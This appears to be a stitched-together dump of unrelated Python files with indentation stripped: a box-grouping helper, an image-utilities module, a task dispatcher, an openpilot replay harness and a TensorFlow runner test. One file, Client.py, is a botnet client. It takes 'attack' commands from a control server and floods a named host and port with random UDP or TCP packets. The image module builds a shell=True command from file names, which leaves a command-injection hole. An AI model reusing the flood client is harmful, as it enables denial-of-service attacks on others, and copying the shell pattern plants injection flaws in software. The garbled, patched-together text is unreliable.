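# illustrative only and not part of the Open3D API.
def group_boxes(boxes, max_items=100):
    """Batch `boxes` into roughly `max_items` groups of consecutive boxes."""
    group_size = int(math.floor(float(len(boxes)) / max_items))
    if group_size < 2:
        # Few enough boxes: one group (one tree item) per box.
        return [[b] for b in boxes]
    groups, current = [], []
    for i, box in enumerate(boxes):
        current.append(box)
        if len(current) >= group_size or i == len(boxes) - 1:
            groups.append(current)
            current = []
    return groups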
|
Client.py
|
import subprocess
import threading
import time
import socket
import os, sys, random
class Client():
send=0
run=False
def __init__(self):
self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
host ,port= '127.0.0.1',9999
self.s.connect((host, port))
self.start()
def __ddos(self,*args):
def dos(*args):
t1=time.time()
host,port=args[1],args[a2]
if args[0] == "udp":s=socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
else:s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
bytes=random._urandom(10240)
s.connect((host, int(port)))
while True:
if not self.run:break
s.sendto(bytes, (host,int(port)))
self.send+=1
#print(str(send)+" Packets Sended Sucessful")
s.close()
print("run time {}".format(time.time()-t1))
for n in range(int(args[4])):
threading.Thread(target = dos,args=[*args]).start()
time.sleep(int(args[3]))
self.run=False
def start(self):
while True:
data = self.s.recv(1024)
data=data[:].decode("utf-8")
data=data.lower()
if "attack" in data:
self.s.send(str.encode("done"))
data=data.replace("attack ","")
data=data.split()
self.run=True
threading.Thread(target = self.__ddos,args=data).start()
elif "kill" in data:
self.run=False
self.s.send(str.encode("Server Stopped"))
elif "ping" in data:
self.s.send(str.encode("kong"))
else:self.s.send(str.encode("ERROR"))
if __name__ == '__main__':
def main():
try:
print("Connecting...")
Client()
except:
print("Failed.... 10 Second wait")
time.sleep(10)
main()
main()
|
image_utils__unused.py
|
import threading
from pathlib import Path
from uuid import uuid4
from base64 import b64encode
from traceback import print_exc
from subprocess import call
import os, shutil
import imageio
import cv2
import numpy as np
#####################
# Generic Functions #
#####################
from shared_utils import folder_utils
def base64_encoded_image(image_path):
with open(image_path, "rb") as image_file:
return b64encode(image_file.read()).decode()
def make_image_data(image_path):
return 'data:image/png;base64,' + base64_encoded_image(image_path)
def check_source_format(source_image):
    # 181 supported file formats
available_formats = ['.1sc', '.2', '.2fl', '.3', '.4', '.acff', '.afi', '.afm', '.aim', '.al3d', '.ali', '.am',
'.amiramesh', '.apl', '.arf', '.avi', '.bif', '.bin', '.bip', '.bmp', '.btf', '.c01',
'.cfg', '.ch5', '.cif', '.cr2', '.crw', '.csv', '.cxd', '.czi', '.dat', '.dcm', '.dib',
'.dicom', '.dm2', '.dm3', '.dm4', '.dti', '.dv', '.eps', '.epsi', '.exp', '.fdf', '.fff',
'.ffr', '.fits', '.flex', '.fli', '.frm', '.gel', '.gif', '.grey', '.h5', '.hdf', '.hdr',
'.hed', '.his', '.htd', '.html', '.hx', '.i2i', '.ics', '.ids', '.im3', '.img', '.ims',
'.inr', '.ipl', '.ipm', '.ipw', '.j2k', '.jp2', '.jpf', '.jpg', '.jpk', '.jpx', '.klb',
'.l2d', '.labels', '.lei', '.lif', '.liff', '.lim', '.lms', '.lsm', '.map', '.mdb',
'.mea', '.mnc', '.mng', '.mod', '.mov', '.mrc', '.mrcs', '.mrw', '.msr', '.mtb', '.mvd2',
'.naf', '.nd', '.nd2', '.ndpi', '.ndpis', '.nef', '.nhdr', '.nii', '.nii.gz', '.nrrd',
'.obf', '.obsep', '.oib', '.oif', '.oir', '.ome', '.ome.btf', '.ome.tf2', '.ome.tf8',
'.ome.tif', '.ome.tiff', '.ome.xml', '.par', '.pbm', '.pcoraw', '.pcx', '.pds', '.pgm',
'.pic', '.pict', '.png', '.pnl', '.ppm', '.pr3', '.ps', '.psd', '.qptiff', '.r3d', '.raw',
'.rcpnl', '.rec', '.res', '.scn', '.sdt', '.seq', '.sif', '.sld', '.sm2', '.sm3', '.spc',
'.spe', '.spi', '.st', '.stk', '.stp', '.svs', '.sxm', '.tf2', '.tf8', '.tfr', '.tga', '.tif',
'.tiff', '.tnb', '.top', '.txt', '.v', '.vff', '.vms', '.vsi', '.vws', '.wat', '.wlz', '.wpi',
'.xdce', '.xml', '.xqd', '.xqf', '.xv', '.xys', '.zfp', '.zfr', '.zvi']
    # Note: os.path.splitext only captures the final extension, so compound
    # formats in the list above such as '.ome.tif' or '.nii.gz' will not
    # match here.
    _, file_extension = os.path.splitext(source_image.name)
    return file_extension.lower() in available_formats
# Save the uploaded file to a cache dir.
def save_source_image(source_image):
dest_dir = folder_utils.get_cache_directory()
_, file_extension = os.path.splitext(source_image.name)
file_path = str(dest_dir.joinpath(uuid4().hex + file_extension))
with open(file_path, mode='wb') as destination:
for chunk in source_image.chunks():
destination.write(chunk)
return file_path
def convert_to_tiff(source_file):
dest_dir = folder_utils.get_cache_directory('converted')
file_name, _ = os.path.splitext(os.path.basename(source_file))
dest_file = str(dest_dir.joinpath(file_name + '.tiff'))
shell_script = f'gm convert {source_file} {dest_file}'
call(shell_script, shell=True)
return dest_file
def save_processing_file(raw_data):
dest_dir = folder_utils.get_cache_directory('raw_data')
file_path = str(dest_dir.joinpath(uuid4().hex + '.png'))
with open(file_path, mode='wb') as destination:
destination.write(raw_data)
return file_path
def save_image(image_array, scale, channel):
dest_dir = folder_utils.get_cache_directory('bioformats')
saved_file = str(dest_dir.joinpath(uuid4().hex + '.png'))
image_size = image_array.shape
img = None
if len(image_size) == 2 and channel is not None:
r = channel['color']['r']
g = channel['color']['g']
b = channel['color']['b']
if r + g + b > 0:
x = np.array((r, g, b), dtype=np.uint8)
_image_array = image_array / scale
img = np.zeros(image_size + (3,))
img[..., 0] = _image_array * x[0]
img[..., 1] = _image_array * x[1]
img[..., 2] = _image_array * x[2]
imageio.imwrite(saved_file, img)
if img is None:
imageio.imwrite(saved_file, image_array)
return saved_file #, len(image_size) == 3 and image_size[2] == 3
def delete_file(file):
t = threading.Thread(target=delete_file_thread, args=[file], daemon=True)
t.start()
def delete_file_thread(file):
if os.path.exists(file):
os.remove(file)
else:
print("The file does not exist")
####################
# OpenCV Functions #
####################
# def split_channels(image_file, channels):
# origin_img = cv2.imread(image_file, 1)
# if len(origin_img.shape) == 3:
# height, width, _ = origin_img.shape[:3]
# else:
# height, width = origin_img.shape[:2]
# zeros = np.zeros((height, width), origin_img.dtype)
# # B, G, R
# blue_ch, green_ch, red_ch = cv2.split(origin_img)
# if channels == 'b':
# img = cv2.merge((blue_ch, zeros, zeros))
# elif channels == 'g':
# img = cv2.merge((zeros, green_ch, zeros))
# elif channels == 'r':
# img = cv2.merge((zeros, zeros, red_ch))
# elif channels == 'bg' or channels == 'gb':
# img = cv2.merge((blue_ch, green_ch, zeros))
# elif channels == 'br' or channels == 'rb':
# img = cv2.merge((blue_ch, zeros, red_ch))
# elif channels == 'gr' or channels == 'rg':
# img = cv2.merge((zeros, green_ch, red_ch))
# else:
# img = cv2.merge((blue_ch, green_ch, red_ch))
# dest_dir = get_cache_directory('channels')
# new_image_file = str(dest_dir.joinpath(uuid4().hex + '.png'))
# cv2.imwrite(new_image_file, img)
# return new_image_file
def convert_to_gray(image_file, bits):
origin_img = cv2.imread(image_file)
img = cv2.cvtColor(origin_img, cv2.COLOR_BGR2GRAY)
if bits == '8':
img = map_uint16_to_uint8(map_uint16_to_uint8(img))
elif bits == '16':
img = map_uint16_to_uint8(img)
dest_dir = folder_utils.get_cache_directory('gray')
new_image_file = str(dest_dir.joinpath(uuid4().hex + '.png'))
cv2.imwrite(new_image_file, img)
return new_image_file
def map_uint16_to_uint8(img, lower_bound=None, upper_bound=None):
if lower_bound is not None and not(0 <= lower_bound < 2**16):
raise ValueError(
'"lower_bound" must be in the range [0, 65535]')
if upper_bound is not None and not(0 <= upper_bound < 2**16):
raise ValueError(
'"upper_bound" must be in the range [0, 65535]')
if lower_bound is None:
lower_bound = np.min(img)
if upper_bound is None:
upper_bound = np.max(img)
if lower_bound >= upper_bound:
raise ValueError(
'"lower_bound" must be smaller than "upper_bound"')
lut = np.concatenate([
np.zeros(lower_bound, dtype=np.uint16),
np.linspace(0, 255, upper_bound - lower_bound).astype(np.uint16),
np.ones(2**16 - upper_bound, dtype=np.uint16) * 255
])
return lut[img].astype(np.uint8)
def change_image_parameter(image_file, brightness, contrast, gamma):
origin_img = cv2.imread(image_file)
brightness = map(brightness, -255, 255, -255, 255)
contrast = map(contrast, -127, 127, -127, 127)
if brightness != 0:
if brightness > 0:
shadow = brightness
highlight = 255
else:
shadow = 0
highlight = 255 + brightness
alpha_b = (highlight - shadow)/255
gamma_b = shadow
buf = cv2.addWeighted(origin_img, alpha_b, origin_img, 0, gamma_b)
else:
buf = origin_img.copy()
if contrast != 0:
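        # Standard contrast scaling: maps contrast in [-127, 127] to a gain f,
        # applied as f*pixel + 127*(1-f) so mid-gray (127) stays fixed.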
f = float(131 * (contrast + 127)) / (127 * (131 - contrast))
alpha_c = f
gamma_c = 127*(1-f)
buf = cv2.addWeighted(buf, alpha_c, buf, 0, gamma_c)
dest_dir = folder_utils.get_cache_directory('temp')
new_image_file = str(dest_dir.joinpath(uuid4().hex + '.png'))
cv2.imwrite(new_image_file, buf)
return new_image_file
def map(x, in_min, in_max, out_min, out_max):
return int((x-in_min) * (out_max-out_min) / (in_max-in_min) + out_min)
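# Usage sketch (assumed, not part of the module API): stretch a synthetic
# 16-bit gradient to 8 bits with the LUT-based conversion above.
if __name__ == '__main__':
    demo = np.arange(2 ** 16, dtype=np.uint16).reshape(256, 256)
    full = map_uint16_to_uint8(demo)                    # min/max stretch
    windowed = map_uint16_to_uint8(demo, 1000, 60000)   # clip, then stretch
    print(full.dtype, full.min(), full.max(), windowed.dtype)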
|
dispatcher.py
|
from multiprocessing import cpu_count
from queue import Queue
from threading import Thread
from .runner import Runner
class Dispatcher:
def __init__(self):
self.tasks = Queue()
self.available = cpu_count()
self.runners = []
self.manage_thread = Thread(target=self.run)
self.manage_thread.start()
def get_available(self):
return max(self.available, 1)
def ingest(self, tasks):
self.available -= len(tasks)
for task in tasks:
self.tasks.put(task)
def run(self):
while True:
if not self.tasks.empty():
task = self.tasks.get()
self.runners += [Runner(task, task)]
            # Iterate over a snapshot: removing from the list while looping
            # over it directly would skip the element after each removed one.
            for runner in list(self.runners):
                if runner.done():
                    self.available += 1
                    self.runners.remove(runner)
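# A self-contained sketch (assumed names, independent of .runner.Runner) of the
# same pattern: a queue feeds a polling loop that frees capacity as tasks
# report done().
if __name__ == "__main__":
    import time

    class _DemoRunner:
        def __init__(self, task):
            self.task = task
            self._t0 = time.time()

        def done(self):
            return time.time() - self._t0 > 0.1

    pending = Queue()
    for name in ("a", "b", "c"):
        pending.put(name)
    running = []
    while not pending.empty() or running:
        if not pending.empty():
            running.append(_DemoRunner(pending.get()))
        # Rebuild the list instead of removing while iterating over it.
        running = [r for r in running if not r.done()]
        time.sleep(0.01)
    print("all demo tasks finished")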
|
process_replay.py
|
#!/usr/bin/env python3
import importlib
import os
import sys
import threading
import time
import signal
from collections import namedtuple
import capnp
import cereal.messaging as messaging
from cereal import car, log
from cereal.services import service_list
from common.params import Params
from common.timeout import Timeout
from selfdrive.car.fingerprints import FW_VERSIONS
from selfdrive.car.car_helpers import get_car, interfaces
from selfdrive.test.process_replay.helpers import OpenpilotPrefix
from selfdrive.manager.process import PythonProcess
from selfdrive.manager.process_config import managed_processes
# Numpy gives different results based on CPU features after version 19
NUMPY_TOLERANCE = 1e-7
CI = "CI" in os.environ
TIMEOUT = 15
PROC_REPLAY_DIR = os.path.dirname(os.path.abspath(__file__))
FAKEDATA = os.path.join(PROC_REPLAY_DIR, "fakedata/")
ProcessConfig = namedtuple('ProcessConfig', ['proc_name', 'pub_sub', 'ignore', 'init_callback', 'should_recv_callback', 'tolerance', 'fake_pubsubmaster', 'submaster_config'], defaults=({},))
def wait_for_event(evt):
if not evt.wait(TIMEOUT):
    if threading.current_thread().name == "MainThread":
# tested process likely died. don't let test just hang
raise Exception("Timeout reached. Tested process likely crashed.")
else:
# done testing this process, let it die
sys.exit(0)
class FakeSocket:
def __init__(self, wait=True):
self.data = []
self.wait = wait
self.recv_called = threading.Event()
self.recv_ready = threading.Event()
def receive(self, non_blocking=False):
if non_blocking:
return None
if self.wait:
self.recv_called.set()
wait_for_event(self.recv_ready)
self.recv_ready.clear()
return self.data.pop()
def send(self, data):
if self.wait:
wait_for_event(self.recv_called)
self.recv_called.clear()
self.data.append(data)
if self.wait:
self.recv_ready.set()
def wait_for_recv(self):
wait_for_event(self.recv_called)
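# A minimal, self-contained sketch (assumed names) of the two-Event handshake
# FakeSocket implements: the consumer signals recv_called before blocking on
# recv_ready, and the producer loads data in between, so exactly one message
# moves per round trip.
def _handshake_demo():
  called, ready, box, out = threading.Event(), threading.Event(), [], []

  def consumer():
    called.set()         # "I am about to receive"
    ready.wait(TIMEOUT)  # block until the producer has loaded data
    out.append(box.pop())

  t = threading.Thread(target=consumer)
  t.start()
  called.wait(TIMEOUT)   # producer side: wait for the receive request
  box.append(b"dat")
  ready.set()
  t.join()
  assert out == [b"dat"]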
class DumbSocket:
def __init__(self, s=None):
if s is not None:
try:
dat = messaging.new_message(s)
except capnp.lib.capnp.KjException: # pylint: disable=c-extension-no-member
# lists
dat = messaging.new_message(s, 0)
self.data = dat.to_bytes()
def receive(self, non_blocking=False):
return self.data
def send(self, dat):
pass
class FakeSubMaster(messaging.SubMaster):
def __init__(self, services, ignore_alive=None, ignore_avg_freq=None):
super().__init__(services, ignore_alive=ignore_alive, ignore_avg_freq=ignore_avg_freq, addr=None)
self.sock = {s: DumbSocket(s) for s in services}
self.update_called = threading.Event()
self.update_ready = threading.Event()
self.wait_on_getitem = False
def __getitem__(self, s):
# hack to know when fingerprinting is done
if self.wait_on_getitem:
self.update_called.set()
wait_for_event(self.update_ready)
self.update_ready.clear()
return self.data[s]
def update(self, timeout=-1):
self.update_called.set()
wait_for_event(self.update_ready)
self.update_ready.clear()
def update_msgs(self, cur_time, msgs):
wait_for_event(self.update_called)
self.update_called.clear()
super().update_msgs(cur_time, msgs)
self.update_ready.set()
def wait_for_update(self):
wait_for_event(self.update_called)
class FakePubMaster(messaging.PubMaster):
def __init__(self, services): # pylint: disable=super-init-not-called
self.data = {}
self.sock = {}
self.last_updated = None
for s in services:
try:
data = messaging.new_message(s)
except capnp.lib.capnp.KjException:
data = messaging.new_message(s, 0)
self.data[s] = data.as_reader()
self.sock[s] = DumbSocket()
self.send_called = threading.Event()
self.get_called = threading.Event()
def send(self, s, dat):
self.last_updated = s
if isinstance(dat, bytes):
self.data[s] = log.Event.from_bytes(dat)
else:
self.data[s] = dat.as_reader()
self.send_called.set()
wait_for_event(self.get_called)
self.get_called.clear()
def wait_for_msg(self):
wait_for_event(self.send_called)
self.send_called.clear()
dat = self.data[self.last_updated]
self.get_called.set()
return dat
def fingerprint(msgs, fsm, can_sock, fingerprint):
print("start fingerprinting")
fsm.wait_on_getitem = True
# populate fake socket with data for fingerprinting
canmsgs = [msg for msg in msgs if msg.which() == "can"]
wait_for_event(can_sock.recv_called)
can_sock.recv_called.clear()
can_sock.data = [msg.as_builder().to_bytes() for msg in canmsgs[:300]]
can_sock.recv_ready.set()
can_sock.wait = False
# we know fingerprinting is done when controlsd sets sm['lateralPlan'].sensorValid
wait_for_event(fsm.update_called)
fsm.update_called.clear()
fsm.wait_on_getitem = False
can_sock.wait = True
can_sock.data = []
fsm.update_ready.set()
def get_car_params(msgs, fsm, can_sock, fingerprint):
if fingerprint:
CarInterface, _, _ = interfaces[fingerprint]
CP = CarInterface.get_params(fingerprint)
else:
can = FakeSocket(wait=False)
sendcan = FakeSocket(wait=False)
canmsgs = [msg for msg in msgs if msg.which() == 'can']
for m in canmsgs[:300]:
can.send(m.as_builder().to_bytes())
_, CP = get_car(can, sendcan)
Params().put("CarParams", CP.to_bytes())
def controlsd_rcv_callback(msg, CP, cfg, fsm):
# no sendcan until controlsd is initialized
socks = [s for s in cfg.pub_sub[msg.which()] if
(fsm.frame + 1) % int(service_list[msg.which()].frequency / service_list[s].frequency) == 0]
if "sendcan" in socks and fsm.frame < 2000:
socks.remove("sendcan")
return socks, len(socks) > 0
def radar_rcv_callback(msg, CP, cfg, fsm):
if msg.which() != "can":
return [], False
elif CP.radarOffCan:
return ["radarState", "liveTracks"], True
radar_msgs = {"honda": [0x445], "toyota": [0x19f, 0x22f], "gm": [0x474],
"chrysler": [0x2d4]}.get(CP.carName, None)
if radar_msgs is None:
raise NotImplementedError
for m in msg.can:
if m.src == 1 and m.address in radar_msgs:
return ["radarState", "liveTracks"], True
return [], False
def calibration_rcv_callback(msg, CP, cfg, fsm):
# calibrationd publishes 1 calibrationData every 5 cameraOdometry packets.
# should_recv always true to increment frame
recv_socks = []
frame = fsm.frame + 1 # incrementing hasn't happened yet in SubMaster
if frame == 0 or (msg.which() == 'cameraOdometry' and (frame % 5) == 0):
recv_socks = ["liveCalibration"]
return recv_socks, fsm.frame == 0 or msg.which() == 'cameraOdometry'
def ublox_rcv_callback(msg):
msg_class, msg_id = msg.ubloxRaw[2:4]
if (msg_class, msg_id) in {(1, 7 * 16)}:
return ["gpsLocationExternal"]
elif (msg_class, msg_id) in {(2, 1 * 16 + 5), (10, 9)}:
return ["ubloxGnss"]
else:
return []
CONFIGS = [
ProcessConfig(
proc_name="controlsd",
pub_sub={
"can": ["controlsState", "carState", "carControl", "sendcan", "carEvents", "carParams"],
"deviceState": [], "pandaStates": [], "peripheralState": [], "liveCalibration": [], "driverMonitoringState": [], "longitudinalPlan": [], "lateralPlan": [], "liveLocationKalman": [], "liveParameters": [], "radarState": [],
"modelV2": [], "driverCameraState": [], "roadCameraState": [], "managerState": [], "testJoystick": [],
},
ignore=["logMonoTime", "valid", "controlsState.startMonoTime", "controlsState.cumLagMs"],
init_callback=fingerprint,
should_recv_callback=controlsd_rcv_callback,
tolerance=NUMPY_TOLERANCE,
fake_pubsubmaster=True,
submaster_config={'ignore_avg_freq': ['radarState', 'longitudinalPlan']}
),
ProcessConfig(
proc_name="radard",
pub_sub={
"can": ["radarState", "liveTracks"],
"liveParameters": [], "carState": [], "modelV2": [],
},
ignore=["logMonoTime", "valid", "radarState.cumLagMs"],
init_callback=get_car_params,
should_recv_callback=radar_rcv_callback,
tolerance=None,
fake_pubsubmaster=True,
),
ProcessConfig(
proc_name="plannerd",
pub_sub={
"modelV2": ["lateralPlan", "longitudinalPlan"],
"carState": [], "controlsState": [], "radarState": [],
},
ignore=["logMonoTime", "valid", "longitudinalPlan.processingDelay", "longitudinalPlan.solverExecutionTime", "lateralPlan.solverExecutionTime"],
init_callback=get_car_params,
should_recv_callback=None,
tolerance=NUMPY_TOLERANCE,
fake_pubsubmaster=True,
),
ProcessConfig(
proc_name="calibrationd",
pub_sub={
"carState": ["liveCalibration"],
"cameraOdometry": []
},
ignore=["logMonoTime", "valid"],
init_callback=get_car_params,
should_recv_callback=calibration_rcv_callback,
tolerance=None,
fake_pubsubmaster=True,
),
ProcessConfig(
proc_name="dmonitoringd",
pub_sub={
"driverState": ["driverMonitoringState"],
"liveCalibration": [], "carState": [], "modelV2": [], "controlsState": [],
},
ignore=["logMonoTime", "valid"],
init_callback=get_car_params,
should_recv_callback=None,
tolerance=NUMPY_TOLERANCE,
fake_pubsubmaster=True,
),
ProcessConfig(
proc_name="locationd",
pub_sub={
"cameraOdometry": ["liveLocationKalman"],
"sensorEvents": [], "gpsLocationExternal": [], "liveCalibration": [], "carState": [],
},
ignore=["logMonoTime", "valid"],
init_callback=get_car_params,
should_recv_callback=None,
tolerance=NUMPY_TOLERANCE,
fake_pubsubmaster=False,
),
ProcessConfig(
proc_name="paramsd",
pub_sub={
"liveLocationKalman": ["liveParameters"],
"carState": []
},
ignore=["logMonoTime", "valid"],
init_callback=get_car_params,
should_recv_callback=None,
tolerance=NUMPY_TOLERANCE,
fake_pubsubmaster=True,
),
ProcessConfig(
proc_name="ubloxd",
pub_sub={
"ubloxRaw": ["ubloxGnss", "gpsLocationExternal"],
},
ignore=["logMonoTime"],
init_callback=None,
should_recv_callback=ublox_rcv_callback,
tolerance=None,
fake_pubsubmaster=False,
),
]
def replay_process(cfg, lr, fingerprint=None):
with OpenpilotPrefix():
if cfg.fake_pubsubmaster:
return python_replay_process(cfg, lr, fingerprint)
else:
return cpp_replay_process(cfg, lr, fingerprint)
def setup_env(simulation=False):
params = Params()
params.clear_all()
params.put_bool("OpenpilotEnabledToggle", True)
params.put_bool("Passive", False)
params.put_bool("DisengageOnAccelerator", True)
params.put_bool("WideCameraOnly", False)
params.put_bool("DisableLogging", False)
os.environ["NO_RADAR_SLEEP"] = "1"
os.environ["REPLAY"] = "1"
if simulation:
os.environ["SIMULATION"] = "1"
elif "SIMULATION" in os.environ:
del os.environ["SIMULATION"]
def python_replay_process(cfg, lr, fingerprint=None):
sub_sockets = [s for _, sub in cfg.pub_sub.items() for s in sub]
pub_sockets = [s for s in cfg.pub_sub.keys() if s != 'can']
fsm = FakeSubMaster(pub_sockets, **cfg.submaster_config)
fpm = FakePubMaster(sub_sockets)
args = (fsm, fpm)
if 'can' in list(cfg.pub_sub.keys()):
can_sock = FakeSocket()
args = (fsm, fpm, can_sock)
all_msgs = sorted(lr, key=lambda msg: msg.logMonoTime)
pub_msgs = [msg for msg in all_msgs if msg.which() in list(cfg.pub_sub.keys())]
setup_env()
# TODO: remove after getting new route for civic & accord
migration = {
"HONDA CIVIC 2016 TOURING": "HONDA CIVIC 2016",
"HONDA ACCORD 2018 SPORT 2T": "HONDA ACCORD 2018",
"HONDA ACCORD 2T 2018": "HONDA ACCORD 2018",
"Mazda CX-9 2021": "MAZDA CX-9 2021",
}
if fingerprint is not None:
os.environ['SKIP_FW_QUERY'] = "1"
os.environ['FINGERPRINT'] = fingerprint
else:
os.environ['SKIP_FW_QUERY'] = ""
os.environ['FINGERPRINT'] = ""
for msg in lr:
if msg.which() == 'carParams':
car_fingerprint = migration.get(msg.carParams.carFingerprint, msg.carParams.carFingerprint)
if msg.carParams.fingerprintSource == "fw" and (car_fingerprint in FW_VERSIONS):
Params().put("CarParamsCache", msg.carParams.as_builder().to_bytes())
else:
os.environ['SKIP_FW_QUERY'] = "1"
os.environ['FINGERPRINT'] = car_fingerprint
assert(type(managed_processes[cfg.proc_name]) is PythonProcess)
managed_processes[cfg.proc_name].prepare()
mod = importlib.import_module(managed_processes[cfg.proc_name].module)
thread = threading.Thread(target=mod.main, args=args)
thread.daemon = True
thread.start()
if cfg.init_callback is not None:
if 'can' not in list(cfg.pub_sub.keys()):
can_sock = None
cfg.init_callback(all_msgs, fsm, can_sock, fingerprint)
CP = car.CarParams.from_bytes(Params().get("CarParams", block=True))
# wait for started process to be ready
if 'can' in list(cfg.pub_sub.keys()):
can_sock.wait_for_recv()
else:
fsm.wait_for_update()
log_msgs, msg_queue = [], []
for msg in pub_msgs:
if cfg.should_recv_callback is not None:
recv_socks, should_recv = cfg.should_recv_callback(msg, CP, cfg, fsm)
else:
recv_socks = [s for s in cfg.pub_sub[msg.which()] if
(fsm.frame + 1) % int(service_list[msg.which()].frequency / service_list[s].frequency) == 0]
should_recv = bool(len(recv_socks))
if msg.which() == 'can':
can_sock.send(msg.as_builder().to_bytes())
else:
msg_queue.append(msg.as_builder())
if should_recv:
fsm.update_msgs(msg.logMonoTime / 1e9, msg_queue)
msg_queue = []
recv_cnt = len(recv_socks)
while recv_cnt > 0:
m = fpm.wait_for_msg().as_builder()
m.logMonoTime = msg.logMonoTime
m = m.as_reader()
log_msgs.append(m)
recv_cnt -= m.which() in recv_socks
return log_msgs
def cpp_replay_process(cfg, lr, fingerprint=None):
sub_sockets = [s for _, sub in cfg.pub_sub.items() for s in sub] # We get responses here
pm = messaging.PubMaster(cfg.pub_sub.keys())
all_msgs = sorted(lr, key=lambda msg: msg.logMonoTime)
pub_msgs = [msg for msg in all_msgs if msg.which() in list(cfg.pub_sub.keys())]
log_msgs = []
# We need to fake SubMaster alive since we can't inject a fake clock
setup_env(simulation=True)
managed_processes[cfg.proc_name].prepare()
managed_processes[cfg.proc_name].start()
try:
with Timeout(TIMEOUT):
while not all(pm.all_readers_updated(s) for s in cfg.pub_sub.keys()):
time.sleep(0)
# Make sure all subscribers are connected
sockets = {s: messaging.sub_sock(s, timeout=2000) for s in sub_sockets}
for s in sub_sockets:
messaging.recv_one_or_none(sockets[s])
for i, msg in enumerate(pub_msgs):
pm.send(msg.which(), msg.as_builder())
resp_sockets = cfg.pub_sub[msg.which()] if cfg.should_recv_callback is None else cfg.should_recv_callback(msg)
for s in resp_sockets:
response = messaging.recv_one(sockets[s])
if response is None:
print(f"Warning, no response received {i}")
else:
response = response.as_builder()
response.logMonoTime = msg.logMonoTime
response = response.as_reader()
log_msgs.append(response)
if not len(resp_sockets): # We only need to wait if we didn't already wait for a response
while not pm.all_readers_updated(msg.which()):
time.sleep(0)
finally:
managed_processes[cfg.proc_name].signal(signal.SIGKILL)
managed_processes[cfg.proc_name].stop()
return log_msgs
def check_enabled(msgs):
for msg in msgs:
if msg.which() == "carParams":
if msg.carParams.notCar:
return True
elif msg.which() == "controlsState":
if msg.controlsState.active:
return True
return False
|
multi_process_runner_test.py
|
# Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for `multi_process_runner`."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import ctypes
import json
import os
import sys
import threading
import time
import unittest
from absl import logging
from tensorflow.python.distribute import multi_process_runner
from tensorflow.python.distribute import multi_worker_test_base
from tensorflow.python.eager import test
def proc_func_that_adds_task_type_in_return_data():
return multi_worker_test_base.get_task_type()
def proc_func_that_errors():
raise ValueError('This is an error.')
def proc_func_that_does_nothing():
pass
def proc_func_that_adds_simple_return_data():
return 'dummy_data'
def proc_func_that_returns_args_and_kwargs(*args, **kwargs):
return list(args) + list(kwargs.items())
def proc_func_with_barrier():
return multi_process_runner.barrier()
def proc_func_that_returns_pid():
return os.getpid()
V = None
def proc_func_that_sets_global(val):
global V
old_val = V
V = val
return old_val
class MultiProcessRunnerTest(test.TestCase):
def _worker_idx(self):
config_task = json.loads(os.environ['TF_CONFIG'])['task']
return config_task['index']
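  # Example TF_CONFIG that _worker_idx() reads (standard TensorFlow format):
  #   {"cluster": {"worker": ["localhost:12345", "localhost:23456"]},
  #    "task": {"type": "worker", "index": 0}}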
def test_multi_process_runner(self):
mpr_result = multi_process_runner.run(
proc_func_that_adds_task_type_in_return_data,
multi_worker_test_base.create_cluster_spec(
num_workers=2, num_ps=3, has_eval=1))
job_count_dict = {'worker': 2, 'ps': 3, 'evaluator': 1}
for data in mpr_result.return_value:
job_count_dict[data] -= 1
self.assertEqual(job_count_dict['worker'], 0)
self.assertEqual(job_count_dict['ps'], 0)
self.assertEqual(job_count_dict['evaluator'], 0)
def test_multi_process_runner_error_propagates_from_subprocesses(self):
runner = multi_process_runner.MultiProcessRunner(
proc_func_that_errors,
multi_worker_test_base.create_cluster_spec(num_workers=1, num_ps=1),
max_run_time=20)
runner.start()
with self.assertRaisesRegexp(ValueError, 'This is an error.'):
runner.join()
def test_multi_process_runner_queue_emptied_between_runs(self):
cluster_spec = multi_worker_test_base.create_cluster_spec(num_workers=2)
return_value = multi_process_runner.run(
proc_func_that_adds_simple_return_data, cluster_spec).return_value
self.assertTrue(return_value)
self.assertEqual(return_value[0], 'dummy_data')
self.assertEqual(return_value[1], 'dummy_data')
return_value = multi_process_runner.run(proc_func_that_does_nothing,
cluster_spec).return_value
self.assertFalse(return_value)
def test_multi_process_runner_args_passed_correctly(self):
return_value = multi_process_runner.run(
proc_func_that_returns_args_and_kwargs,
multi_worker_test_base.create_cluster_spec(num_workers=1),
args=('a', 'b'),
kwargs={
'c_k': 'c_v'
}).return_value
self.assertEqual(return_value[0][0], 'a')
self.assertEqual(return_value[0][1], 'b')
self.assertEqual(return_value[0][2], ('c_k', 'c_v'))
def test_stdout_captured(self):
def simple_print_func():
print('This is something printed.', flush=True)
return 'This is returned data.'
mpr_result = multi_process_runner.run(
simple_print_func,
multi_worker_test_base.create_cluster_spec(num_workers=2),
list_stdout=True)
std_stream_results = mpr_result.stdout
return_value = mpr_result.return_value
self.assertIn('[worker-0]: This is something printed.\n',
std_stream_results)
self.assertIn('[worker-1]: This is something printed.\n',
std_stream_results)
self.assertIn('This is returned data.', return_value)
def test_termination(self):
def proc_func():
for i in range(0, 10):
print(
'index {}, iteration {}'.format(self._worker_idx(), i), flush=True)
time.sleep(5)
mpr = multi_process_runner.MultiProcessRunner(
proc_func,
multi_worker_test_base.create_cluster_spec(num_workers=2),
list_stdout=True)
mpr.start()
time.sleep(5)
mpr.terminate('worker', 0)
std_stream_results = mpr.join().stdout
# Worker 0 is terminated in the middle, so it should not have iteration 9
# printed.
self.assertIn('[worker-0]: index 0, iteration 0\n', std_stream_results)
self.assertNotIn('[worker-0]: index 0, iteration 9\n',
std_stream_results)
self.assertIn('[worker-1]: index 1, iteration 0\n', std_stream_results)
self.assertIn('[worker-1]: index 1, iteration 9\n', std_stream_results)
def test_termination_and_start_single_process(self):
def proc_func():
for i in range(0, 10):
print(
'index {}, iteration {}'.format(self._worker_idx(), i), flush=True)
time.sleep(1)
mpr = multi_process_runner.MultiProcessRunner(
proc_func,
multi_worker_test_base.create_cluster_spec(num_workers=2),
list_stdout=True)
mpr.start()
time.sleep(3)
